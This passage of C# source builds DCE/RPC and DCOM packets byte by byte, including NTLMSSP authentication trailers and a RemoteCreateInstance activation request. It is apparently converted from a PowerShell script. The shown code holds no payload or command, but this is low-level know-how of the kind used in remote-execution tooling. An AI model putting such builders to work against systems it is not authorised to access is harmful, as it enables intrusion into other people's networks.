/// <param name="packet_NTLMSSP">NTLMSSP blob placed in the "RPCAUTH3_NTLMSSP" field.</param>
/// <returns>The field dictionary in wire order (16 entries).</returns>
/// <remarks>
/// The original carried the note "4 extra bytes?" next to the +28; the 4 presumably account
/// for the two 2-byte MaxXmitFrag/MaxRecvFrag fields below — TODO confirm. The constant is
/// kept unchanged.
/// </remarks>
public static OrderedDictionary RPCAuth3(byte[] packet_NTLMSSP)
{
    // Low two bytes (host byte order) of a 32-bit value, for the 16-bit length fields.
    Func<int, byte[]> lowWord = value =>
    {
        byte[] all = BitConverter.GetBytes(value);
        return new byte[] { all[0], all[1] };
    };

    byte[] authLength = lowWord(packet_NTLMSSP.Length);
    byte[] fragLength = lowWord(packet_NTLMSSP.Length + 28);

    var auth3 = new OrderedDictionary
    {
        { "RPCAUTH3_Version", new byte[] { 0x05 } },
        { "RPCAUTH3_VersionMinor", new byte[] { 0x00 } },
        { "RPCAUTH3_PacketType", new byte[] { 0x10 } },
        { "RPCAUTH3_PacketFlags", new byte[] { 0x03 } },
        { "RPCAUTH3_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 } },
        { "RPCAUTH3_FragLength", fragLength },
        { "RPCAUTH3_AuthLength", authLength },
        { "RPCAUTH3_CallID", new byte[] { 0x03, 0x00, 0x00, 0x00 } },
        { "RPCAUTH3_MaxXmitFrag", new byte[] { 0xd0, 0x16 } },
        { "RPCAUTH3_MaxRecvFrag", new byte[] { 0xd0, 0x16 } },
        { "RPCAUTH3_AuthType", new byte[] { 0x0a } },
        { "RPCAUTH3_AuthLevel", new byte[] { 0x02 } },
        { "RPCAUTH3_AuthPadLength", new byte[] { 0x00 } },
        { "RPCAUTH3_AuthReserved", new byte[] { 0x00 } },
        { "RPCAUTH3_ContextID", new byte[] { 0x00, 0x00, 0x00, 0x00 } },
        { "RPCAUTH3_NTLMSSP", packet_NTLMSSP },
    };

    return auth3;
}
/// <summary>
/// Builds an RPC request PDU (packet type 0x00): fixed header fields, the caller-supplied
/// flags, call ID, context ID and opnum, and the payload when it is non-empty.
/// FragLength counts packet_service_length + 24 + the auth trailer + the payload;
/// AllocHint counts packet_service_length + the payload only.
/// </summary>
/// <param name="packet_flags">PacketFlags bytes.</param>
/// <param name="packet_service_length">Stub length already computed by the caller.</param>
/// <param name="packet_auth_length">Auth verifier length; 0 means no trailer is counted.</param>
/// <param name="packet_auth_padding">Padding in front of the verifier, counted only when packet_auth_length &gt; 0.</param>
/// <param name="packet_call_ID">Call ID bytes.</param>
/// <param name="packet_context_ID">Context ID bytes.</param>
/// <param name="packet_opnum">Opnum bytes.</param>
/// <param name="packet_data">Payload; null or empty means no "RPCRequest_Data" field (the PowerShell original is sometimes called without it).</param>
/// <returns>The field dictionary in wire order; FragLength and AuthLength are the low two bytes of their 32-bit values in host byte order.</returns>
public static OrderedDictionary RPCRequest(byte[] packet_flags, int packet_service_length, int packet_auth_length, int packet_auth_padding, byte[] packet_call_ID, byte[] packet_context_ID, byte[] packet_opnum, byte[] packet_data)
{
    // The +8 is carried over from the original script unchanged.
    int authTrailerLength = packet_auth_length > 0
        ? packet_auth_length + packet_auth_padding + 8
        : 0;
    int payloadLength = packet_data != null ? packet_data.Length : 0;

    byte[] fragLength32 = BitConverter.GetBytes(packet_service_length + 24 + authTrailerLength + payloadLength);
    byte[] authLength32 = BitConverter.GetBytes(packet_auth_length);

    var request = new OrderedDictionary
    {
        { "RPCRequest_Version", new byte[] { 0x05 } },
        { "RPCRequest_VersionMinor", new byte[] { 0x00 } },
        { "RPCRequest_PacketType", new byte[] { 0x00 } },
        { "RPCRequest_PacketFlags", packet_flags },
        { "RPCRequest_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 } },
        { "RPCRequest_FragLength", new byte[] { fragLength32[0], fragLength32[1] } },
        { "RPCRequest_AuthLength", new byte[] { authLength32[0], authLength32[1] } },
        { "RPCRequest_CallID", packet_call_ID },
        { "RPCRequest_AllocHint", BitConverter.GetBytes(packet_service_length + payloadLength) },
        { "RPCRequest_ContextID", packet_context_ID },
        { "RPCRequest_Opnum", packet_opnum },
    };

    if (payloadLength > 0)
    {
        request.Add("RPCRequest_Data", packet_data);
    }

    return request;
}
/// <summary>
/// Builds the RPC alter-context PDU (packet type 0x0e) for a single presentation context
/// using the caller's association group, call ID, context ID and interface UUID.
/// </summary>
/// <param name="packet_assoc_group">AssocGroup bytes.</param>
/// <param name="packet_call_ID">Call ID bytes.</param>
/// <param name="packet_context_ID">Context ID bytes.</param>
/// <param name="packet_interface_UUID">Interface UUID bytes.</param>
/// <returns>The field dictionary in wire order (23 entries).</returns>
/// <remarks>
/// The last entry, keyed "" with an empty array, contributes no bytes on the wire; it looks like
/// a leftover from the conversion and is kept only so the dictionary shape is unchanged — TODO confirm
/// nothing relies on it.
/// </remarks>
public static OrderedDictionary RPCAlterContext(byte[] packet_assoc_group, byte[] packet_call_ID, byte[] packet_context_ID, byte[] packet_interface_UUID)
{
    var alterContext = new OrderedDictionary
    {
        { "RPCAlterContext_Version", new byte[] { 0x05 } },
        { "RPCAlterContext_VersionMinor", new byte[] { 0x00 } },
        { "RPCAlterContext_PacketType", new byte[] { 0x0e } },
        { "RPCAlterContext_PacketFlags", new byte[] { 0x03 } },
        { "RPCAlterContext_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 } },
        { "RPCAlterContext_FragLength", new byte[] { 0x48, 0x00 } },
        { "RPCAlterContext_AuthLength", new byte[] { 0x00, 0x00 } },
        { "RPCAlterContext_CallID", packet_call_ID },
        { "RPCAlterContext_MaxXmitFrag", new byte[] { 0xd0, 0x16 } },
        { "RPCAlterContext_MaxRecvFrag", new byte[] { 0xd0, 0x16 } },
        { "RPCAlterContext_AssocGroup", packet_assoc_group },
        { "RPCAlterContext_NumCtxItems", new byte[] { 0x01 } },
        { "RPCAlterContext_Unknown", new byte[] { 0x00, 0x00, 0x00 } },
        { "RPCAlterContext_ContextID", packet_context_ID },
        { "RPCAlterContext_NumTransItems", new byte[] { 0x01 } },
        { "RPCAlterContext_Unknown2", new byte[] { 0x00 } },
        { "RPCAlterContext_Interface", packet_interface_UUID },
        { "RPCAlterContext_InterfaceVer", new byte[] { 0x00, 0x00 } },
        { "RPCAlterContext_InterfaceVerMinor", new byte[] { 0x00, 0x00 } },
        { "RPCAlterContext_TransferSyntax", new byte[] { 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60 } },
        { "RPCAlterContext_TransferSyntaxVer", new byte[] { 0x02, 0x00, 0x00, 0x00 } },
        // Zero-length placeholder entry, see remarks.
        { "", new byte[] { } },
    };

    return alterContext;
}
/// <summary>
/// Lays out the NTLMSSP authentication trailer that follows the stub data of a DCE/RPC PDU:
/// an optional zero-filled pad (presumably to align the trailer), the sec_trailer
/// (auth_type 0x0a = NTLM, auth_level, auth_pad_length, reserved, auth_context_id) and the
/// NTLMSSP message signature (version 1, 8-byte checksum, sequence number).
/// </summary>
/// <param name="packet_auth_padding">Pad size in bytes. Only 4, 8 and 12 produce a pad entry; any other value (including 0) emits no pad and reports a pad length of 0.</param>
/// <param name="packet_auth_level">Bytes for the auth_level field; presumably 1 byte — not validated here.</param>
/// <param name="packet_sequence_number">Bytes for the signature's sequence number; presumably 4 bytes — not validated here.</param>
/// <returns>Field name to raw bytes, in wire order.</returns>
/// <remarks>
/// The checksum field is emitted as eight zero bytes; presumably the caller overwrites it once
/// the signature has been computed — confirm against the caller.
/// </remarks>
public static OrderedDictionary NTLMSSPVerifier(int packet_auth_padding, byte[] packet_auth_level, byte[] packet_sequence_number)
{
    var trailer = new OrderedDictionary();
    byte[] padLengthField;

    switch (packet_auth_padding)
    {
        case 4:
        case 8:
        case 12:
            // Zero-filled pad of the requested size; the size is echoed in auth_pad_length.
            trailer.Add("NTLMSSPVerifier_AuthPadding", new byte[packet_auth_padding]);
            padLengthField = new byte[] { (byte)packet_auth_padding };
            break;
        default:
            padLengthField = new byte[] { 0x00 };
            break;
    }

    // sec_trailer
    trailer.Add("NTLMSSPVerifier_AuthType", new byte[] { 0x0a });
    trailer.Add("NTLMSSPVerifier_AuthLevel", packet_auth_level);
    trailer.Add("NTLMSSPVerifier_AuthPadLen", padLengthField);
    trailer.Add("NTLMSSPVerifier_AuthReserved", new byte[] { 0x00 });
    trailer.Add("NTLMSSPVerifier_ContextID", new byte[] { 0x00, 0x00, 0x00, 0x00 });
    // NTLMSSP signature: version, checksum placeholder, sequence number.
    trailer.Add("NTLMSSPVerifier_NTLMSSPVerifierVersionNumber", new byte[] { 0x01, 0x00, 0x00, 0x00 });
    trailer.Add("NTLMSSPVerifier_NTLMSSPVerifierChecksum", new byte[8]);
    trailer.Add("NTLMSSPVerifier_NTLMSSPVerifierSequenceNumber", packet_sequence_number);

    return trailer;
}
/// <summary>
/// Lays out the stub data of a DCOM IRemUnknown::RemQueryInterface request: an ORPCTHIS
/// header (DCOM version 5.7, flags, reserved, causality id) followed by the target IPID,
/// a reference count of 5, one requested IID and the IID itself.
/// </summary>
/// <param name="packet_causality_ID">Causality id bytes; presumably 16 bytes — not validated here.</param>
/// <param name="packet_IPID">Interface pointer id of the object being queried; presumably 16 bytes — not validated here.</param>
/// <param name="packet_IID">Interface id being requested; presumably 16 bytes — not validated here.</param>
/// <returns>Field name to raw bytes, in wire order.</returns>
/// <remarks>
/// The final key, "DCOMRemQueryInterface_", is truncated in the original layout and is kept
/// verbatim here in case consumers look the entry up by name.
/// </remarks>
public static OrderedDictionary DCOMRemQueryInterface(byte[] packet_causality_ID, byte[] packet_IPID, byte[] packet_IID)
{
    var request = new OrderedDictionary
    {
        // ORPCTHIS
        { "DCOMRemQueryInterface_VersionMajor", new byte[] { 0x05, 0x00 } },
        { "DCOMRemQueryInterface_VersionMinor", new byte[] { 0x07, 0x00 } },
        { "DCOMRemQueryInterface_Flags", new byte[4] },
        { "DCOMRemQueryInterface_Reserved", new byte[4] },
        { "DCOMRemQueryInterface_CausalityID", packet_causality_ID },
        { "DCOMRemQueryInterface_Reserved2", new byte[4] },
        // RemQueryInterface arguments
        { "DCOMRemQueryInterface_IPID", packet_IPID },
        { "DCOMRemQueryInterface_Refs", new byte[] { 0x05, 0x00, 0x00, 0x00 } },
        { "DCOMRemQueryInterface_IIDs", new byte[] { 0x01, 0x00 } },
        { "DCOMRemQueryInterface_Unknown", new byte[] { 0x00, 0x00, 0x01, 0x00, 0x00, 0x00 } },
        { "DCOMRemQueryInterface_", packet_IID },
    };

    return request;
}
/// <summary>
/// Lays out the stub data of a DCOM IRemUnknown::RemRelease request that releases two
/// interface pointers: an ORPCTHIS header (DCOM version 5.7, flags, reserved, causality id)
/// followed by an interface-ref count of 2 and, for each IPID, 5 public refs and 0 private refs.
/// </summary>
/// <param name="packet_causality_ID">Causality id bytes; presumably 16 bytes — not validated here.</param>
/// <param name="packet_IPID">First interface pointer id to release; presumably 16 bytes — not validated here.</param>
/// <param name="packet_IPID2">Second interface pointer id to release; presumably 16 bytes — not validated here.</param>
/// <returns>Field name to raw bytes, in wire order.</returns>
/// <remarks>
/// Keys carry the "packet_DCOMRemRelease_" prefix rather than the "DCOMRemRelease_" prefix used
/// by sibling builders; they are kept verbatim in case consumers look entries up by name.
/// </remarks>
public static OrderedDictionary DCOMRemRelease(byte[] packet_causality_ID, byte[] packet_IPID, byte[] packet_IPID2)
{
    var request = new OrderedDictionary
    {
        // ORPCTHIS
        { "packet_DCOMRemRelease_VersionMajor", new byte[] { 0x05, 0x00 } },
        { "packet_DCOMRemRelease_VersionMinor", new byte[] { 0x07, 0x00 } },
        { "packet_DCOMRemRelease_Flags", new byte[4] },
        { "packet_DCOMRemRelease_Reserved", new byte[4] },
        { "packet_DCOMRemRelease_CausalityID", packet_causality_ID },
        { "packet_DCOMRemRelease_Reserved2", new byte[4] },
        // RemRelease arguments: count, then two interface refs
        { "packet_DCOMRemRelease_Unknown", new byte[] { 0x02, 0x00, 0x00, 0x00 } },
        { "packet_DCOMRemRelease_InterfaceRefs", new byte[] { 0x02, 0x00, 0x00, 0x00 } },
        { "packet_DCOMRemRelease_IPID", packet_IPID },
        { "packet_DCOMRemRelease_PublicRefs", new byte[] { 0x05, 0x00, 0x00, 0x00 } },
        { "packet_DCOMRemRelease_PrivateRefs", new byte[4] },
        { "packet_DCOMRemRelease_packet_IPID2", packet_IPID2 },
        { "packet_DCOMRemRelease_PublicRefs2", new byte[] { 0x05, 0x00, 0x00, 0x00 } },
        { "packet_DCOMRemRelease_PrivateRefs2", new byte[4] },
    };

    return request;
}
/// <summary>
/// Lays out the stub data of a DCOM IRemoteSCMActivator::RemoteCreateInstance request as an
/// ordered field map: an ORPCTHIS header, a custom-marshalled OBJREF carrying an
/// ActivationPropertiesIn blob, and the six activation property structures it references
/// (SpecialSystemProperties, InstantiationInfo, ActivationContextInfo, SecurityInfo,
/// LocationInfo, ScmRequestInfo). Only the SecurityInfo server name depends on the input;
/// every other field is a fixed byte pattern.
/// </summary>
/// <param name="packet_causality_ID">Causality id bytes; presumably 16 bytes — not validated here.</param>
/// <param name="packet_target">Server name placed in SecurityInfo as a UTF-16LE conformant string.</param>
/// <returns>Field name to raw bytes, in wire order.</returns>
/// <exception cref="ArgumentNullException">Thrown by <see cref="Encoding.GetBytes(string)"/> when <paramref name="packet_target"/> is null.</exception>
/// <remarks>
/// The string's MaxCount/ActualCount are the UTF-16 code-unit count plus one (terminator).
/// The encoded name is zero-extended to the next multiple of 8 that is strictly greater than
/// its length, so a name whose UTF-16 length is already a multiple of 8 gains 8 bytes; that
/// padding covers the terminator and the NDR alignment. The constants 720, 680, 664, 40 and 56
/// are fixed offsets of the enclosing structures in this layout and are not derived here.
/// The 8-byte "CommonHeader" values (01 10 08 00 cc cc cc cc) match the NDR type-serialization
/// version-1 common header. The GUID bytes are written in little-endian GUID order.
/// </remarks>
public static OrderedDictionary DCOMRemoteCreateInstance(byte[] packet_causality_ID, string packet_target)
{
    byte[] targetUtf16 = Encoding.Unicode.GetBytes(packet_target);
    byte[] nameCount = BitConverter.GetBytes(packet_target.Length + 1);

    // Pad to the next multiple of 8 strictly above the current length (integer form of
    // Truncate(len / 8 + 1) * 8 - len). Array.Resize zero-fills the new tail.
    int padBytes = (targetUtf16.Length / 8 + 1) * 8 - targetUtf16.Length;
    Array.Resize(ref targetUtf16, targetUtf16.Length + padBytes);

    int paddedLength = targetUtf16.Length;
    byte[] cntData = BitConverter.GetBytes(paddedLength + 720);
    byte[] customObjrefSize = BitConverter.GetBytes(paddedLength + 680);
    byte[] propertiesTotalSize = BitConverter.GetBytes(paddedLength + 664);
    byte[] securityInfoPrivateHeader = BitConverter.GetBytes(paddedLength + 40).Concat(new byte[4]).ToArray();
    byte[] securityInfoDataSize = BitConverter.GetBytes(paddedLength + 56);

    // Fresh instance per use so no two entries alias the same array.
    Func<byte[]> typeHeader = () => new byte[] { 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc };

    var request = new OrderedDictionary
    {
        // ORPCTHIS
        { "DCOMRemoteCreateInstance_DCOMVersionMajor", new byte[] { 0x05, 0x00 } },
        { "DCOMRemoteCreateInstance_DCOMVersionMinor", new byte[] { 0x07, 0x00 } },
        { "DCOMRemoteCreateInstance_DCOMFlags", new byte[] { 0x01, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_DCOMReserved", new byte[4] },
        { "DCOMRemoteCreateInstance_DCOMCausalityID", packet_causality_ID },
        { "DCOMRemoteCreateInstance_Unknown", new byte[4] },
        { "DCOMRemoteCreateInstance_Unknown2", new byte[4] },
        { "DCOMRemoteCreateInstance_Unknown3", new byte[] { 0x00, 0x00, 0x02, 0x00 } },
        { "DCOMRemoteCreateInstance_Unknown4", cntData },
        // OBJREF (signature "MEOW", OBJREF_CUSTOM) wrapping the IActivationPropertiesIn blob
        { "DCOMRemoteCreateInstance_IActPropertiesCntData", cntData },
        { "DCOMRemoteCreateInstance_IActPropertiesOBJREFSignature", new byte[] { 0x4d, 0x45, 0x4f, 0x57 } },
        { "DCOMRemoteCreateInstance_IActPropertiesOBJREFFlags", new byte[] { 0x04, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesOBJREFIID", new byte[] { 0xa2, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFCLSID", new byte[] { 0x38, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFCBExtension", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFSize", customObjrefSize },
        // CustomHeader: six property structs, their CLSIDs and sizes
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesTotalSize", propertiesTotalSize },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesReserved", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderCommonHeader", typeHeader() },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderPrivateHeader", new byte[] { 0xb0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderTotalSize", propertiesTotalSize },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderCustomHeaderSize", new byte[] { 0xc0, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderReserved", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesDestinationContext", new byte[] { 0x02, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesNumActivationPropertyStructs", new byte[] { 0x06, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsInfoClsid", new byte[16] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrReferentID", new byte[] { 0x00, 0x00, 0x02, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrReferentID", new byte[] { 0x04, 0x00, 0x02, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesNULLPointer", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrMaxCount", new byte[] { 0x06, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid", new byte[] { 0xb9, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid2", new byte[] { 0xab, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid3", new byte[] { 0xa5, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid4", new byte[] { 0xa6, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid5", new byte[] { 0xa4, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid6", new byte[] { 0xaa, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrMaxCount", new byte[] { 0x06, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize", new byte[] { 0x68, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize2", new byte[] { 0x58, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize3", new byte[] { 0x90, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize4", securityInfoDataSize },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize5", new byte[] { 0x20, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize6", new byte[] { 0x30, 0x00, 0x00, 0x00 } },
        // Property 1: SpecialSystemProperties
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesCommonHeader", typeHeader() },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesPrivateHeader", new byte[] { 0x58, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesSessionID", new byte[] { 0xff, 0xff, 0xff, 0xff } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesRemoteThisSessionID", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesClientImpersonating", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesPartitionIDPresent", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesDefaultAuthnLevel", new byte[] { 0x02, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesPartitionGuid", new byte[16] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesProcessRequestFlags", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesOriginalClassContext", new byte[] { 0x14, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesFlags", new byte[] { 0x02, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesReserved", new byte[32] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesUnusedBuffer", new byte[8] },
        // Property 2: InstantiationInfo (class context 0x14, one requested interface id)
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoCommonHeader", typeHeader() },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoPrivateHeader", new byte[] { 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoInstantiatedObjectClsId", new byte[] { 0x5e, 0xf0, 0xc3, 0x8b, 0x6b, 0xd8, 0xd0, 0x11, 0xa0, 0x75, 0x00, 0xc0, 0x4f, 0xb6, 0x88, 0x20 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoClassContext", new byte[] { 0x14, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoActivationFlags", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoFlagsSurrogate", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoInterfaceIdCount", new byte[] { 0x01, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoInstantiationFlag", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIdsPtr", new byte[] { 0x00, 0x00, 0x02, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationEntirePropertySize", new byte[] { 0x58, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationVersionMajor", new byte[] { 0x05, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationVersionMinor", new byte[] { 0x07, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIdsPtrMaxCount", new byte[] { 0x01, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIds", new byte[] { 0x18, 0xad, 0x09, 0xf3, 0x6a, 0xd8, 0xd0, 0x11, 0xa0, 0x75, 0x00, 0xc0, 0x4f, 0xb6, 0x88, 0x20 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIdsUnusedBuffer", new byte[4] },
        // Property 3: ActivationContextInfo (embeds a second custom OBJREF for the client context)
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoCommonHeader", typeHeader() },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoPrivateHeader", new byte[] { 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientOk", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoReserved", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoReserved2", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoReserved3", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrReferentID", new byte[] { 0x00, 0x00, 0x02, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoNULLPtr", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextUnknown", new byte[] { 0x60, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextCntData", new byte[] { 0x60, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFSignature", new byte[] { 0x4d, 0x45, 0x4f, 0x57 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFFlags", new byte[] { 0x04, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFIID", new byte[] { 0xc0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } },
